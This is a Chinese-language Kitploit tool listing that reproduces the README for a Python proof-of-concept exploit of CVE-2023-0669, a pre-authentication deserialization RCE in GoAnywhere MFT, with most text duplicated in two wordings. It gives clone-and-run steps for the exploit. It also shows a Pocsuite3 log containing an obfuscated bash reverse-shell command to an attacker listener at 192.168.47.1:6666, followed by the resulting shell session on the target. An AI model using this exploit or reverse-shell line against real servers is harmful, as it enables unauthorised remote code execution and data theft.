Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-0669 — GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet 反序列化漏洞 Python RCE PoC(概念验证) | Kitploit
工具/GitHubGitHub/avento/cve-2023-0669
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制Payload 开发
GitHubavento/cve-2023-0669

CVE-2023-0669

GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet 反序列化漏洞 Python RCE PoC(概念验证)

查看仓库
833年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-0669 GoAnywhere MFT 反序列化 - Je Yiuwai's Blog

CVE-2023-0669

CVE-2023-0669是一个GoAnywhere MFT反序列化漏洞,由于反序列化一个任意攻击者控制的对象,在License Response Servlet中存在一个预先认证的命令注入漏洞。攻击者可以利用该漏洞在受影响的系统上执行任意代码,从而导致系统被完全控制。该漏洞影响版本为7.1.2之前,不包括7.1.2。

CVE-2023-0669 是 GoAnywhere MFT 中的一个反序列化漏洞,存在于 License Response Servlet 中。由于该 Servlet 在反序列化攻击者可控的对象时存在缺陷,导致了一个未经身份验证的命令注入漏洞。攻击者可以利用该漏洞在受影响的系统上执行任意代码,从而完全控制系统。该漏洞影响 7.1.2 之前的版本(不含 7.1.2)。

该漏洞可能会对企业级文件传输软件GoAnywhere MFT的安全性造成严重威胁。攻击者可以通过利用该漏洞来窃取敏感数据、篡改数据、破坏系统等。因此,用户需要及时采取措施来保护系统安全。

该漏洞对企业级文件传输软件 GoAnywhere MFT 的安全性构成了严重威胁。攻击者可利用该漏洞窃取敏感数据、篡改数据或破坏系统。因此,用户需要立即采取措施保护系统安全。

官方已经发布了安全通告,并提供了初步检查方法。用户可以检查userdata/logs日志中是否有特定字符串出现来判断系统是否受到此漏洞的影响。如果无法更新补丁,建议采取其他安全措施来保护系统安全。

官方已发布安全公告,并提供了初步检测方法。用户可通过检查 userdata/logs 日志中是否出现特定字符串来判断系统是否受到影响。若无法更新补丁,建议采取其他安全措施保护系统。

总之,CVE-2023-0669是一个需要引起用户重视的反序列化漏洞,用户需要及时更新到最新版本,并检查系统是否受到此漏洞的影响。同时,建议用户加强对GoAnywhere MFT等企业级软件的安全管理,采取多层次的安全措施来保护系统安全。

总之,CVE-2023-0669 是一个需要用户警惕的反序列化漏洞。用户应及时更新至最新版本,并检查系统是否受到影响。此外,建议加强对 GoAnywhere MFT 等企业级软件的安全管理,采取多层安全措施保护系统。

CVE-2023-0669 PoC

简介

该Exploit是一个基于Python的脚本,用于利用GoAnywhere MFT v6.7.9594及以下版本中的漏洞CVE-2023-0669。

漏洞描述

该漏洞是由于GoAnywhere MFT在处理加密的Bundle请求时存在安全问题,攻击者可以发送特制的请求,并在目标服务器上执行任意代码。

使用方法

1.克隆本仓库

root@kitploit:~
git clone https://github.com/Avento/CVE-2023-0669.git

2.进入CVE-2023-0669目录

root@kitploit:~
cd CVE-2023-0669

3.安装依赖库requests和cryptography

root@kitploit:~
pip install requests cryptography

4.运行Exploit

root@kitploit:~
python CVE-2023-0669.py --host <目标服务器IP>

注意事项

  • 运行该Exploit需要合法的访问权限,且不应用于非法用途。
  • 由于该Exploit的执行会对目标服务器造成风险,因此使用者需要对其风险和后果自行负责。

简介

该 Exploit 是一个 Python 脚本,用于利用 GoAnywhere MFT v6.7.9594 及更低版本中的 CVE-2023-0669 漏洞。

漏洞描述

此漏洞是因为 GoAnywhere MFT 在处理加密的 Bundle 请求时存在安全问题,攻击者可发送特制请求,在目标服务器上执行任意代码。

使用方法

  1. 克隆本仓库
root@kitploit:~
git clone https://github.com/Avento/CVE-2023-0669.git
  1. 进入目录
root@kitploit:~
cd CVE-2023-0669
  1. 安装依赖 requests 和 cryptography
root@kitploit:~
pip install requests cryptography
  1. 运行 Exploit
root@kitploit:~
python CVE-2023-0669.py --host <target IP>

注意

  • 运行此 Exploit 需要合法的访问权限,不得用于非法目的。
  • 由于执行该 Exploit 会对目标服务器带来风险,用户需自行承担风险与后果。

RCE

root@kitploit:~
$ python3 CVE-2023-0669.py --host 192.168.47.179:8000
Exploit Success ~

Pocsuite3

root@kitploit:~
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > check
[11:10:53] [INFO] pocsusite got a total of 1 tasks
[11:10:53] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
[11:10:53] [+] Version : 7.0.3
[11:10:53] [INFO] Scan completed,ready to print

+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
| target-url                 |                           poc-name                           |     poc-id    |   component    |         version          |  status |
----------+---------+
| http://192.168.47.179:8000 | CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化 | CVE-2023-0669 | GoAnywhere MFT | 7.1.2 之前,不 包括 7.1.2 | success |
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
success : 1 / 1
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > shell
[11:11:55] [INFO] pocsusite got a total of 1 tasks
[11:11:55] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
/bin/bash -c bash$IFS-i$IFS>&$IFS/dev/tcp/192.168.47.1/6666<&1
[11:11:55] [*] listening on 0.0.0.0:6666
[11:11:56] [+] new connection established from 192.168.47.179
[11:11:56] [INFO] Scan completed,ready to print
[11:11:56] [INFO] connect back ip: 192.168.47.1    port: 6666
[11:11:56] [INFO] watting for shell connect to pocsuite
Now Connected: 192.168.47.179
SHELL (192.168.47.179) > id
bash: cannot set terminal process group (20029): Inappropriate ioctl for device
bash: no job control in this shell
ubuntu@ubuntu:~/HelpSystems/GoAnywhere$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)

作者:Je Yiuwai 由 xiaomi pad 6 pro 编辑

下载工具